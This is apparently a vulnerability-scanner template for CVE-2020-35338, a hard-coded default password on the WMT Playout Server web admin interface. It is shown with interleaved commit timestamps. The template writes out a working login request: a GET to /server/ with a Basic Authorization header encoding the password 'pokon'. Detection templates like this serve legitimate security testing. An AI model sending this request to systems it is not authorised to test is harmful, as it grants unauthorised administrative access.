2021-04-21 15:35:47 +00:00
id : CVE-2020-35338
2021-04-21 16:38:46 +00:00
2021-04-21 15:35:47 +00:00
info :
2021-04-21 16:38:46 +00:00
author : Jeya Seelan
2021-04-21 15:35:47 +00:00
severity : critical
2021-04-21 16:38:46 +00:00
name : Default Credentials of WMT Server
description : The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2020-35338
- https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
tags : cve,cve2020,wmt,default-login
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-35338
cwe-id : CWE-798
2021-04-21 15:35:47 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/server/"
headers :
Authorization : "Basic OnBva29u"
2021-04-21 16:38:46 +00:00
matchers-condition : and
2021-04-21 15:35:47 +00:00
matchers :
2021-04-21 16:38:46 +00:00
- type : status
2021-04-21 15:35:47 +00:00
status :
- 200
2021-04-21 16:38:46 +00:00
- type : word
words :
- "<title>WMT Server playout"
